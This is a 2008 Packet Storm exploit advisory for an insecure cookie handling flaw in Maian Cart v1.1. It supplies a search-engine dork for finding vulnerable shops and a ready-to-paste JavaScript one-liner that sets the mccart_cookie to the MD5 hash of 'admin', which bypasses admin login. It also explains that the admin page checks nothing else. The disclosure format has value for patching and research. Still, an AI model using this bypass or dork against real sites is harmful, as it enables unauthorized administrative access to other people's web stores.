maiancart-cookie.txt

2008-07-15T00:00:00
ID PACKETSTORM:68155
Type packetstorm
Reporter Saime
Modified 2008-07-15T00:00:00

Description

                                        
                                            `Author: Saime  
Date: July 12, 2008  
Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability  
URL: http://www.maianscriptworld.co.uk  
Dork: Powered by Maian Cart v1.1  
  
Description:  
Maian Car v1.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mccart_cookie,  
equals admin username(md5)  
  
Exploit:  
javascript:document.cookie = "mccart_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"  
  
Note:  
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin  
  
`